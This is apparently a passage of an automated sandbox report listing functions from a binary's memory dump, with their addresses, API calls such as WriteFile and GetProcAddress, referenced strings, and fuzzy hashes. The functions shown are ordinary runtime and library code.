                                                                                                                                                        • Instruction ID: fec16f541b7490ee249730938c6347457bec97bad59d53de7f480f79d9019c4f
                                                                                                                                                        • Opcode Fuzzy Hash: a5a4fd58c38c50cd9b0ed4a8c0d837c6f16f8cfc27926df6d633965bf062e73d
                                                                                                                                                        • Instruction Fuzzy Hash: 00318275A002199FDF14EBA4CC5EFAE7B69FB48710F04056EF80AA7281DF385A05CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006AAA5E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,006AACB9,?,00000050,?,?,?,?,?), ref: 006AAB39
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                        • API String ID: 0-711371036
                                                                                                                                                        • Opcode ID: b4f2a48551fdd94a3dfab2c03d2bc49e5f21b2cfbb7fbeeb4e5691f9188507ef
                                                                                                                                                        • Instruction ID: b6204b5e4dd1d5f31d723a9e02704b166d54f72b2bc4ce48b76a518134f162b0
                                                                                                                                                        • Opcode Fuzzy Hash: b4f2a48551fdd94a3dfab2c03d2bc49e5f21b2cfbb7fbeeb4e5691f9188507ef
                                                                                                                                                        • Instruction Fuzzy Hash: 1421D672A00105A6DB34BAE88A01BE773DBEB56B50F564066EA4AD7300F732DD01CB72
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042A8F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042A8F4
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0042A8FF
                                                                                                                                                          • Part of subcall function 00472AE5: __EH_prolog.LIBCMT ref: 00472AEA
                                                                                                                                                          • Part of subcall function 0045D80A: __EH_prolog.LIBCMT ref: 0045D80F
                                                                                                                                                          • Part of subcall function 0041D068: __EH_prolog.LIBCMT ref: 0041D06D
                                                                                                                                                          • Part of subcall function 004AAE29: __EH_prolog.LIBCMT ref: 004AAE2E
                                                                                                                                                          • Part of subcall function 0043F7E2: __EH_prolog.LIBCMT ref: 0043F7E7
                                                                                                                                                          • Part of subcall function 0043F7E2: new.LIBCMT ref: 0043F80C
                                                                                                                                                          • Part of subcall function 004A5476: std::_Deallocate.LIBCONCRT ref: 004A54A6
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$Deallocatestd::_$ExceptionException@8RaiseThrow
                                                                                                                                                        • String ID: :bnotes
                                                                                                                                                        • API String ID: 1125004306-326818466
                                                                                                                                                        • Opcode ID: 0512627774032b42028312398e4df9c80c5ab32c90a91d01ac9ea1f53defc90e
                                                                                                                                                        • Instruction ID: 029a2b59613941748779a66d82a072b74cfbae75cfcc51ec99fe74e805edec20
                                                                                                                                                        • Opcode Fuzzy Hash: 0512627774032b42028312398e4df9c80c5ab32c90a91d01ac9ea1f53defc90e
                                                                                                                                                        • Instruction Fuzzy Hash: 7831A770D04288EADB14EBA5CD55BDEFFB4AF91308F1080AEE045A7292DBB81F49C755
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004297D9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004297DD
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004297E8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow
                                                                                                                                                        • String ID: t4x
                                                                                                                                                        • API String ID: 1681477883-1229788007
                                                                                                                                                        • Opcode ID: 4a7cc27302e2bd1babbde1a55a7ca794d1559042ee017e4f4888b987aabd5eaa
                                                                                                                                                        • Instruction ID: 42561c3d165b6e6f050f4efe600bb886c9c9861296c9b6b8e535a8643083d963
                                                                                                                                                        • Opcode Fuzzy Hash: 4a7cc27302e2bd1babbde1a55a7ca794d1559042ee017e4f4888b987aabd5eaa
                                                                                                                                                        • Instruction Fuzzy Hash: 4C21D270A00108AFDB18FFE5D891AFEBBA8EF04304F14442EF145A7281DA785E4487A9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069F57B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,0069F9B8,00000003,?,00000000,?,00000003,0000000C), ref: 0069F625
                                                                                                                                                        • GetLastError.KERNEL32(?,0069F9B8,00000003,?,00000000,?,00000003,0000000C,00000003,00000003,0000000C,?,0077A878,00000014,00692FD5,00000000), ref: 0069F64E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 442123175-2802557318
                                                                                                                                                        • Opcode ID: 346147af71d471e18dc86fb86d03b03b3473641e3739cf81053aa6d62e597b07
                                                                                                                                                        • Instruction ID: 239aa4148fcb442b9c2304282f53986ad740fdcc2392a6da26eeb009d6e4b07d
                                                                                                                                                        • Opcode Fuzzy Hash: 346147af71d471e18dc86fb86d03b03b3473641e3739cf81053aa6d62e597b07
                                                                                                                                                        • Instruction Fuzzy Hash: 83319171A012199BCF24CF59CC809DAB3FAFF58310F2185BAE50AD7660E630A981CB64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069F49C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,0069F9D8,00000003,?,00000000,?,00000003,0000000C), ref: 0069F537
                                                                                                                                                        • GetLastError.KERNEL32(?,0069F9D8,00000003,?,00000000,?,00000003,0000000C,00000003,00000003,0000000C,?,0077A878,00000014,00692FD5,00000000), ref: 0069F560
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 442123175-2802557318
                                                                                                                                                        • Opcode ID: 93080111a37517a5cfb0d87d6be085dc06976c6530ade4020d9bd7f875f9755f
                                                                                                                                                        • Instruction ID: fb4e00df49567a699e7aed90d2da0728e2f125524156c8db35eab9f414a51b7f
                                                                                                                                                        • Opcode Fuzzy Hash: 93080111a37517a5cfb0d87d6be085dc06976c6530ade4020d9bd7f875f9755f
                                                                                                                                                        • Instruction Fuzzy Hash: 1F21BF75A002199FCF14CF19CC80AEAB7FAFB48316F1144AAE94AD7651D730ED82CB64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C4C40, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 005C4D03
                                                                                                                                                          • Part of subcall function 005C5140: ReleaseSemaphore.KERNEL32(00000000,?,00000000,00000000,00000028,00000000,005C4AB3,?,00000000), ref: 005C5166
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Concurrency::details::_Lock::_ReaderReleaseScoped_lockScoped_lock::~_SemaphoreWriter
                                                                                                                                                        • String ID: )K7~$)K7~
                                                                                                                                                        • API String ID: 1145072209-412123606
                                                                                                                                                        • Opcode ID: d240b637fa9200c9e6e60f932efaa401a775029b9d387f6c9bb1936c23b03590
                                                                                                                                                        • Instruction ID: ce134277a8ed1af89508b82836b0cf4b2db0a8303f1a08e09a92ded4d3a28956
                                                                                                                                                        • Opcode Fuzzy Hash: d240b637fa9200c9e6e60f932efaa401a775029b9d387f6c9bb1936c23b03590
                                                                                                                                                        • Instruction Fuzzy Hash: 75212F3551011A9FCB14EBE0D866FEFBBBCFF54300F40452DA51297591EF34AA08CAA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00412DE2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00412DE7
                                                                                                                                                          • Part of subcall function 00412FB1: __EH_prolog.LIBCMT ref: 00412FB6
                                                                                                                                                          • Part of subcall function 0041326E: __EH_prolog.LIBCMT ref: 00413273
                                                                                                                                                        • new.LIBCMT ref: 00412E44
                                                                                                                                                          • Part of subcall function 0041300C: __EH_prolog.LIBCMT ref: 00413011
                                                                                                                                                          • Part of subcall function 00413665: __EH_prolog.LIBCMT ref: 0041366A
                                                                                                                                                        Strings
                                                                                                                                                        • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00412E1E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                                                                                        • API String ID: 3519838083-2395993697
                                                                                                                                                        • Opcode ID: 078e5d36db2bf7b82977b4e63305d2edb2b36a43a88cdb2d7767ab08c2a8cc99
                                                                                                                                                        • Instruction ID: a0b9ea58d6edb98cd058725c194820e9e6e5e2cc4daacae925e91727ff325561
                                                                                                                                                        • Opcode Fuzzy Hash: 078e5d36db2bf7b82977b4e63305d2edb2b36a43a88cdb2d7767ab08c2a8cc99
                                                                                                                                                        • Instruction Fuzzy Hash: 5D318FB0D05288EADB05EFE9D5557DEBFB5AF15308F10409DE045AB282CBB80B48C76A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00422932, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00422937
                                                                                                                                                        • std::_Winerror_message.LIBCPMT ref: 0042297F
                                                                                                                                                          • Part of subcall function 0057BE42: FormatMessageW.KERNEL32(00001200,00000000,00000008,00000000,?,00000000,00000000,00000000,00000000,00000001,00007FFF,00000000,?,00007FFF,00007FFF,00000000), ref: 0057BE90
                                                                                                                                                          • Part of subcall function 0057BE42: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 0057BEAF
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$ByteCharDeallocateFormatH_prologMessageMultiWideWinerror_message
                                                                                                                                                        • String ID: unknown error
                                                                                                                                                        • API String ID: 2358782872-3078798498
                                                                                                                                                        • Opcode ID: 4a9aa99e8dc0fc38da99ef78f619a88cff9fff45b5bbdcc5bf243b138044898a
                                                                                                                                                        • Instruction ID: 1df9f156948607634ffa1fff74d16928dbfd276890fcc7a6db3c5de01e4ab483
                                                                                                                                                        • Opcode Fuzzy Hash: 4a9aa99e8dc0fc38da99ef78f619a88cff9fff45b5bbdcc5bf243b138044898a
                                                                                                                                                        • Instruction Fuzzy Hash: 5E215CB2901209EBDB00EF99D9919EEFBB8FF58354F04042EE505A7211DB745A88CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A1A09, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID: @,y$D,y
                                                                                                                                                        • API String ID: 269201875-367022775
                                                                                                                                                        • Opcode ID: ab6454dab569eaabaa3dbc532dfa8b8d4fe6e600dac404f63c3643da0f290b5b
                                                                                                                                                        • Instruction ID: f9e0a82d87b2f85e46859951e8fb050687a6bb55594c78554c5c766d68bd9936
                                                                                                                                                        • Opcode Fuzzy Hash: ab6454dab569eaabaa3dbc532dfa8b8d4fe6e600dac404f63c3643da0f290b5b
                                                                                                                                                        • Instruction Fuzzy Hash: 4B11E77150A3069FD760BF24D451B92B7EAEF13364F30401DE2898F742D6719C818B94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004C8586, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004C858B
                                                                                                                                                          • Part of subcall function 004A65FB: __EH_prolog.LIBCMT ref: 004A6600
                                                                                                                                                          • Part of subcall function 004A6306: __EH_prolog.LIBCMT ref: 004A630B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: ,L$R8J
                                                                                                                                                        • API String ID: 3519838083-1964178626
                                                                                                                                                        • Opcode ID: 03ace888ad956bf0309672069c165e67b26e3d0545a859a7967967c9625f048b
                                                                                                                                                        • Instruction ID: 3ec5f5a9e71977e5ad07c8f775a4826ed87a69183a665ff35684f94c99d197cc
                                                                                                                                                        • Opcode Fuzzy Hash: 03ace888ad956bf0309672069c165e67b26e3d0545a859a7967967c9625f048b
                                                                                                                                                        • Instruction Fuzzy Hash: BC217FB1A00208DFDB14DF69C985A6ABBF9FF89304F10856EE445DB342D7B59E01CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004A11E2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004A11E7
                                                                                                                                                          • Part of subcall function 004A6580: __EH_prolog.LIBCMT ref: 004A6585
                                                                                                                                                          • Part of subcall function 004A6306: __EH_prolog.LIBCMT ref: 004A630B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: R8J$lL
                                                                                                                                                        • API String ID: 3519838083-1997904659
                                                                                                                                                        • Opcode ID: 16bec9857c3e6cf74c54273626f9f1af584566491be0a875a0d6f64e677972d0
                                                                                                                                                        • Instruction ID: 9a39c82d9e577dfaac598cbec3d0dc1a03641512fb240cf4e4fa8bad05335333
                                                                                                                                                        • Opcode Fuzzy Hash: 16bec9857c3e6cf74c54273626f9f1af584566491be0a875a0d6f64e677972d0
                                                                                                                                                        • Instruction Fuzzy Hash: 7E216BB1A00204DFEB24DF69C584A6ABBF9FF85304B1089AEE455DB252D3B5DE01CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C54D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 005C5571
                                                                                                                                                        Strings
                                                                                                                                                        • )K7~, xrefs: 005C54D3
                                                                                                                                                        • boost::filesystem::path codecvt to wstring, xrefs: 005C5552
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                                        • String ID: )K7~$boost::filesystem::path codecvt to wstring
                                                                                                                                                        • API String ID: 2005118841-932701316
                                                                                                                                                        • Opcode ID: 82f4ae4451988d9693464ed079ae8a0aced0ebd6346eec095b1812ef70950005
                                                                                                                                                        • Instruction ID: b67681a29fbc982c5886d3bbf542280faa315b4b8749d2447af2d5cb9cee2cad
                                                                                                                                                        • Opcode Fuzzy Hash: 82f4ae4451988d9693464ed079ae8a0aced0ebd6346eec095b1812ef70950005
                                                                                                                                                        • Instruction Fuzzy Hash: 9A110DB6608345AF8600EB98D845D6FF7EDFFC9750F804A1EF58593200EA74ED448BA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C5580, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 005C5621
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                                        • String ID: )K7~$boost::filesystem::path codecvt to string
                                                                                                                                                        • API String ID: 2005118841-1786881922
                                                                                                                                                        • Opcode ID: 83b33705d7b95a5b7a5e4fea7ce0e5134af8e1b58ae7539f91389366d7ee28e3
                                                                                                                                                        • Instruction ID: f658dec7919866785e2882eeaa1207b22d43170ac55cc3c19f11e1f6d8384541
                                                                                                                                                        • Opcode Fuzzy Hash: 83b33705d7b95a5b7a5e4fea7ce0e5134af8e1b58ae7539f91389366d7ee28e3
                                                                                                                                                        • Instruction Fuzzy Hash: 76112BB2608305AF8200EB94D845D6FF7EDFFC9750F804A1EF58193200EA64E9448BA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A1EE1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 006A1F41
                                                                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006A1F4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 2279764990-2802557318
                                                                                                                                                        • Opcode ID: 1356ba27c720466bb6536fe425c23085d035f2f225548062430c10377e671944
                                                                                                                                                        • Instruction ID: f85128c89046432f898d25ec1b3fee31d021e51a4d2e888dbe690d9180f6116e
                                                                                                                                                        • Opcode Fuzzy Hash: 1356ba27c720466bb6536fe425c23085d035f2f225548062430c10377e671944
                                                                                                                                                        • Instruction Fuzzy Hash: C011E773A011649F9B21AE19DC4099A77D7AB83370B564221FD14AF254D734DC428BD0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0051E190, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • %s:%d: error: (%d) %s, xrefs: 0051E208
                                                                                                                                                        • %s:%d: error: (%d) %s in function %s, xrefs: 0051E1D3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: %s:%d: error: (%d) %s$%s:%d: error: (%d) %s in function %s
                                                                                                                                                        • API String ID: 3519838083-3777411579
                                                                                                                                                        • Opcode ID: d4364a0fd855272f1231433a77b1b57b3cb977a4cbe124b5e1c4c23cafc13c3a
                                                                                                                                                        • Instruction ID: 4a51dedfdb6bc4c3a0245ccb3385801cf713e5145241c6b7b05351dd67d89b0a
                                                                                                                                                        • Opcode Fuzzy Hash: d4364a0fd855272f1231433a77b1b57b3cb977a4cbe124b5e1c4c23cafc13c3a
                                                                                                                                                        • Instruction Fuzzy Hash: 4B219271540604EFEB18DF54C846EEABBBAFB05304F40095DE412975E2D376EAC4CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042363F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • invalid wchar_t filename argument, xrefs: 0042368B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prologTo_byte
                                                                                                                                                        • String ID: invalid wchar_t filename argument
                                                                                                                                                        • API String ID: 2823267341-1601001258
                                                                                                                                                        • Opcode ID: 09c31b9a0d74001a5038710e5e36e83a12512e7b6bc9cf077262866e0feb944c
                                                                                                                                                        • Instruction ID: 36a43c1cd4b69cab585d945c12e25a5841389da05bf81f5fcdd7e309c16e2460
                                                                                                                                                        • Opcode Fuzzy Hash: 09c31b9a0d74001a5038710e5e36e83a12512e7b6bc9cf077262866e0feb944c
                                                                                                                                                        • Instruction Fuzzy Hash: DE117CB2901209AADB14EF99D9916FEFBB8FF59314F10016FE404A7201D7745B888BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AFCC5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memcmp
                                                                                                                                                        • String ID: IsString()$rhs.IsString()
                                                                                                                                                        • API String ID: 2931989736-3903486248
                                                                                                                                                        • Opcode ID: 9205f3926940e85cbbf504cf46e0afe88e53bc60394bf35f91af403eae5fd0e3
                                                                                                                                                        • Instruction ID: b2bf388042a16ba295338b8f8c9cc05bb0864ffbd5c3e70bc74a9fb8ae2cff4e
                                                                                                                                                        • Opcode Fuzzy Hash: 9205f3926940e85cbbf504cf46e0afe88e53bc60394bf35f91af403eae5fd0e3
                                                                                                                                                        • Instruction Fuzzy Hash: E901DB76B44205367E0031E59D8287E634DDBB7BACB14003BF90797382F99D9C0692AE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00696394, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00696430: GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,000000D9,?,?), ref: 006964E0
                                                                                                                                                          • Part of subcall function 00696430: GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,000000D9,?,?), ref: 00696503
                                                                                                                                                        • _abort.LIBCMT ref: 0069641B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
